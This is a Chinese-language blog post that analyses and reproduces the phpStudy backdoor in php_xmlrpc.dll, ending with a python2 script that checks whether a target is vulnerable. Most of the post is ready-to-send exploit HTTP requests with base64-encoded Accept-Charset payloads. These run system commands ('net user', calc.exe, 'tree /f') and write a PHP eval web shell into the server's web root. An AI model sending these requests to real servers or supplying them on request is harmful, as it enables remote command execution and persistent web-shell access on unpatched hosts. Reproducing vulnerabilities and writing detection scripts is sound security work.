phpStudy後門分析及復現
參考文章:https://blog.csdn.net/qq_38484285/article/details/101381883
感謝大佬分享!!
SSRF漏洞學習終於告一段落,很早就知道phpstudy爆出來有後門,爆出漏洞的過程好像還挺奇葩的,時間也不算很充裕,今天簡單學習下。
影響版本
目前已知受影響的phpStudy版本
phpstudy 2016版php-5.4
phpstudy 2018版php-5.2.17
phpstudy 2018版php-5.4.45
後門位置
phpStudy2016和phpStudy2018自帶php-5.2.17、php-5.4.45
後門隱藏在程式自帶的php的php_xmlrpc.dll模組
在*:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext找到php_xmlrpc.dll
phpStudy2016路徑
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路徑
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
用notepad開啟此檔案查詢@eval,檔案存在@eval(%s(‘%s’))證明漏洞存在,如圖:
說明:存在後門!!!!
要求
- 請求任意字尾為php的檔案
- 存在Accept-Encoding: gzip,deflate
- accept-charset: 這裡就是你要執行的程式碼命令(經過base64加密)
漏洞復現
exp_net user
GET /index.php HTTP/1.1 Host: 192.168.31.182 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate Connection: close accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 //主要是這行 base64解碼之後就是 echo system("net user"); Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
遠端命令執行成功,在響應中,可檢視到電腦中的使用者
exp_system('calc.exe')
GET /index.php HTTP/1.1 Host: 192.168.0.108 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate Connection: close accept-charset:c3lzdGVtKCdjYWxjLmV4ZScpOw // base64 解碼之後 system('calc.exe'); calc.exe是計算器 Upgrade-Insecure-Requests: 1
exp_寫一句話木馬菜刀連結
GET /index.php HTTP/1.1 Host: 192.168.0.108 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate Connection: close accept-charset:c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=
//system('echo ^<?php @eval($_POST["shell"])?^>>PHPTutorial\WWW\shell.php'); Upgrade-Insecure-Requests: 1
可能遇到的問題
- 若無法成功連線,可能生成目錄不對,執行命令tree /f檢視檔案樹,找到可訪問路徑生成shell
GET /phpinfo.php HTTP/1.1 Host: 192.168.0.108 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27 Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Sec-Fetch-Site: none, accept-charset: c3lzdGVtKCd0cmVlIC9mJyk7 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.9
2.復現漏洞的過程中,我自己遇到一個問題,請求包放到repeater時,會加入很多的空格。
Accept-Encoding: gzip, deflate
在Accept-Encoding中,deflate的前面都有一個空格,這個空格導致重訪無法成功,去掉空格即可。
漏洞檢測指令碼(python2)
import urllib2 import sys import zlib headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36", "content-type": "text/xml", "Connection": "close", "Accept-Language":" zh-CN,zh;q=0.9", "Accept-Charset":"ZWNobyAnYmFja2Rvb3InOw==", "Accept-Encoding":"gzip,deflate", "Upgrade-Insecure-Requests":"1", } def check(target): GetTarget = urllib2.Request(url=target,headers=headers) response = urllib2.urlopen(GetTarget) result = response.read() if response.info().get('Content-Encoding') == 'gzip': result = zlib.decompress(result, 16+zlib.MAX_WBITS) if 'phpstudy backdoor' in result: print('{0} {1}'.format(target,'存在後門')) else: print('{0} {1}'.format(target,'不存在後門')) if __name__ == '__main__': print 'PHPStudy 後門檢測工具' print '正在檢測 ', sys.argv[1] check(sys.argv[1])
注意啊,這是python2的環境,現在urllib2庫現在沒有了!!!!